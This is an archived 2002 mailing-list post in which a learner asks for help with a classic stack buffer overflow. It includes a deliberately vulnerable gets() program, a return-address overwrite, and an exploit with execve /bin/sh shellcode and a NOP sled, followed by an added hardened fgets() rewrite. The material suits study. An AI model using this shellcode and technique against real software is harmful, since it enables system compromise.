Vulnerability Development mailing list archives

More Buffer Overphlow Questions


From: "Jeremy Junginger" <jjunginger () interactcommerce com>
Date: Wed, 24 Jul 2002 12:55:41 -0700

In reading the following link, I decided to play with the examples and
try to figure out a simple buffer overflow.  Just to say I've at least
made one do something predictable.  At any rate, I have gotten to the
point where I can make the program call the function twice before
dumping.  I am a little stuck when it comes to inserting the shellcode.
I'll highlight what I think is the code I'm not understanding
completely.  Please take a look if you have time, and even if you don't,
thanks for reading the post:

http://www.neworder.box.sk/newsread.php?newsid=5333 

Below is a modified version of the code presented on the above link.  I
assume NO CREDIT for this code other than I have changed a couple of
variables.  I'm just trying to illustrate a concept rather than create
something original at this point.  Keeping this in mind, read on:

--------------------------------

/*This one works:*/ 
/*PROGRAM WITH BUFFER OF 255*/ 
/*TESTDS.C*/ 
#include <stdio.h>

/* Deliberately vulnerable: gets() takes no length, so any input longer
   than 255 bytes is written past small[] into the rest of the stack frame. */
void lame() { 
    char small[255]; 
    gets(small);                /* unbounded read from stdin */
    printf("%s\n", small); 
} 

int main() { 
    lame(); 
    return 0;
} 

-----------------------------------

/*Running this one and piping the output to testds makes the program run
twice:*/ 
/*PROGRAM TO OVERFLOW TESTDS*/ 
/*This will hit call lame twice, so the output should be two identical
lines followed by a core dump*/ 
/*If it does not core dump, issue the ulimit -c 10000 command*/ 
/*TESTDS_EXPLOIT.C*/ 
#include <stdio.h>

/* Assumes a 32-bit x86 build, where long is 4 bytes (as are the addresses used here). */
int main(void) 
{ 
    int i = 0;
    char buf[273];              /* 272 bytes of payload plus a terminating NUL */
    for (i = 0; i < 272; i += 4) 
        *(long *)&buf[i] = 0x80484ca; 
    buf[272] = '\0';            /* puts() needs a C string; without the NUL it reads past buf */
    puts(buf); 
    return 0;
} 

------------------------------------

/*I don't think I have the memory address or something correct.  This is
where I need help.  Anyone?!?*/ 
/*PROGRAM TO RUN SHELLCODE FROM TESTDS*/ 
/*1 Fill the buffer with the return address,*/ 
/*2 Fill the buffer with NOPS,*/ 
/*3 Copy the shellcode at the end of the NOPS,*/ 
/*4 set the home variable and */ 
/*5 execute TESTDS.*/ 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0" 
"\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd" 
"\x80\xe8\xde\xff\xff\xff/bin/sh"; 

int main() 
{ 
    char buffer[268 + 1];       /* payload plus a terminating NUL */
    long retaddr = 0xbffffa10;  /*Return Address, I got this from info reg
                                  esp after overflowing the buffer*/ 
    int i; 
    fprintf(stderr, "using address 0x%lx\n", retaddr); 
    for (i = 0; i < 268; i += 4) 
        *(long *)&buffer[i] = retaddr;                  /*Fills Buffer with Ret Address*/ 
    for (i = 0; i < 268 - (int)strlen(shellcode) - 100; i++) 
        buffer[i] = 0x90;                               /*Fills the Buffer with NOPS*/ 
    memcpy(buffer + i, shellcode, strlen(shellcode));   /*Shellcode is copied at
                                                          the end of the NOPS*/ 
    buffer[268] = '\0';                                 /* setenv() reads up to the first NUL */
    setenv("HOME", buffer, 1);                          /*Sets HOME VARIABLE*/ 
    execlp("TESTDS", "TESTDS", NULL);                   /*Execute Program*/ 
    return 0; 
} 


Thanks for the assistance. 
-Jeremy 
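The overflow in TESTDS.C exists because gets() takes no length argument. The following is an added example, not part of Jeremy's post or of the linked tutorial: the same lame() function rewritten around a bounded line reader. The names read_line_bounded, safe_lame, demo_read and constructed_line are chosen here, and fmemopen (POSIX.1-2008) is assumed available so the reader can be exercised on constructed in-memory input. It distinguishes three cases gets() cannot: a line that fits, a line that fills the buffer exactly, and an overlong line whose excess is discarded rather than written past the buffer.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define SMALL_SIZE 255   /* same capacity as small[] in TESTDS.C */

/* Bounded replacement for gets(): read one line from `in` into dst[cap].
 * Returns  1 if a whole line fit (trailing newline stripped),
 *          0 if the line was longer than cap-1 bytes (dst holds the first
 *            cap-1 bytes; the rest of the line is drained so the stream
 *            stays aligned on a line boundary),
 *         -1 on EOF/error with nothing read.
 * dst is always NUL-terminated when cap > 0. */
int read_line_bounded(FILE *in, char *dst, size_t cap) {
    if (cap == 0) return -1;
    if (fgets(dst, (int)cap, in) == NULL) { dst[0] = '\0'; return -1; }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') { dst[len - 1] = '\0'; return 1; }
    /* No newline in dst: the line either ended at EOF, filled the buffer
     * exactly, or was truncated. Read one more byte to tell these apart. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return 1;
    while (c != '\n' && c != EOF) c = fgetc(in);   /* discard the overflow */
    return 0;
}

/* Hardened counterpart of lame(): same buffer, no way to write past it. */
int safe_lame(void) {
    char small[SMALL_SIZE];
    int r = read_line_bounded(stdin, small, sizeof small);
    if (r < 0) return r;
    if (r == 0)
        fprintf(stderr, "warning: input truncated to %zu bytes\n", sizeof small - 1);
    printf("%s\n", small);
    return r;
}

/* --- demo plumbing over constructed in-memory input (assumed names) --- */
static char scratch[SMALL_SIZE];
static char constructed[302];

/* Run the bounded reader over `text`, leaving the line in `scratch`. */
int demo_read(const char *text) {
    FILE *f = fmemopen((void *)text, strlen(text), "r");
    if (!f) return -1;
    int r = read_line_bounded(f, scratch, sizeof scratch);
    fclose(f);
    return r;
}

size_t demo_len(void) { return strlen(scratch); }

/* A constructed line: n copies of ch followed by a newline. */
const char *constructed_line(size_t n, char ch) {
    if (n > sizeof constructed - 2) n = sizeof constructed - 2;
    memset(constructed, ch, n);
    constructed[n] = '\n';
    constructed[n + 1] = '\0';
    return constructed;
}

int main(void) {
    /* Same behaviour as TESTDS when fed a short line; an overlong line is
     * truncated and reported instead of corrupting the stack. */
    return safe_lame() < 0 ? 1 : 0;
}
```

Piping the output of TESTDS_EXPLOIT.C into this version prints the first 254 bytes and a truncation warning; the return address copies never reach the saved frame.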
